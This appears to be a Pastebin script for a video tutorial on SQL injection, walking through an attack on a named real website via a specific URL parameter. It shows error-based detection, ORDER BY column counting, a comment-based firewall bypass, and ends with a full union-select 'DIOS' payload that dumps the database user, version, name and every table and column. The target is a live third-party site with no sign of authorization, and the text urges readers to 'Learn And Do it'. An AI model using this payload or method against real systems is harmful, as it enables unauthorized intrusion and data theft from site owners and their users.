Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Hello guys how are you...
- iam fine ...
- So today you learn basic of sql injection
- .......
- i am hasan afaque ... :)
- I hope you all are fine
- So today we learn how to inject a vulnerable website..
- so lets start
- So you know about some knowledge about Sql
- if you donot no What is sql .. so i will describe now ..
- Sql stand for structured query language and it is a database :)
- So now talk about sql injection what is it ?
- So lets start :)
- Q1:) What is SQL ?
- Ans:) SQL Stand for (Structured Query Language) and it was first introduced as a commercial database
- systemin 1979 by Oracle Corporation.
- Q1:) What is SQL Injection ?
- Ans:) An SQL injection is a kind of injection vulnerability in which the attacker tries to inject arbitrary
- pieces of malicious data into the input fields of an application.
- So Today we will a Inject a site .
- Site :: http://www.egyankosh.in/
- Injecting Point :: http://www.egyankosh.in/campus.php?id=207
- Requirments
- 1) Hack Bar (i will give link in description :) so donot worry :) i will upload hackbar)
- 2) Some knowledge about SQL (if you no ... So open google.com and learn from it =D)
- in deskop i have Hackbar
- so now i upload hackbar to firefox :)
- Watch carefully :)
- Press f9 to open or close hack bar :) so lets start ...
- Site is http://www.egyankosh.in/
- And this is Injecting Point .
- so lets .. go
- http://www.egyankosh.in/campus.php?id=207' when we put quote sql error become generate,,
- ok its mean the website is vulnerable..
- so what will we do
- 1) find columns of website
- 2) Then union select
- 3) print table or column and your name , user, database ...
- going to find columns of website
- to find column we will do order by
- so lets see
- no error
- order by 5 .. no error
- order by 10 .. error
- order by 8 ... error
- order by 7 no error ... so their is 7 columns ... :)
- now our mission is to union select it :) so lets see
- and put - after id=
- Error
- This is Waf
- What is waf
- Answer:) It stand for web application firewall
- so lets bypass it..
- /*5000Union*/
- http://www.egyankosh.in/campus.php?id=-207 /*!50000union+*/select 1,2,3,4,5,6,7
- 2 and 5 comes...
- means 2 and 5 is vulnerable column ...
- we can write over query in 2 and 5 only :)
- means we can execute query in it .. ok
- lets do dios ...
- Dios stand for DataInOneShort
- .... i can print tables and column now with dios ...
- union based > > Dios my sql >> Zen
- then execute it
- Wawoo .. Tables and columns show on page..
- Now our goal is .. to print name or user or database
- for print name+user+database+tables+columns .. we will concat it .. so lets concat it
- to print user we write
- User()
- Database: database()
- and for name we can convert in 0x
- we lets go
- offf for bidden error again so again bypass it with /*50000*/
- yahoo bypassed now we can break it..
- means to come on next line so we use </br> in hackbar its already given lets use it
- Now print User
- now print database
- for version :: we can write :: version()
- so lets print columns and tables
- Tables + columns + user + name .. done '
- Thanks for watching ...
- Please Subscribe Channel .... Learn And Do it
- ................................. See in next tutorial ```````````````````````````````````````
- http://www.egyankosh.in/campus.php?id=-207 /*!50000union+*/select 1,/*!50000concat*/
- (0x596f754e616d65,0x3c62723e,user(),0x3c62723e,version(),make_set(6,@:=0x0a,(select(1)from
- (information_schema.columns)where@:=make_set
- (511,@,0x3c6c693e,table_name,column_name)),@)),3,4,database(),6,7
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement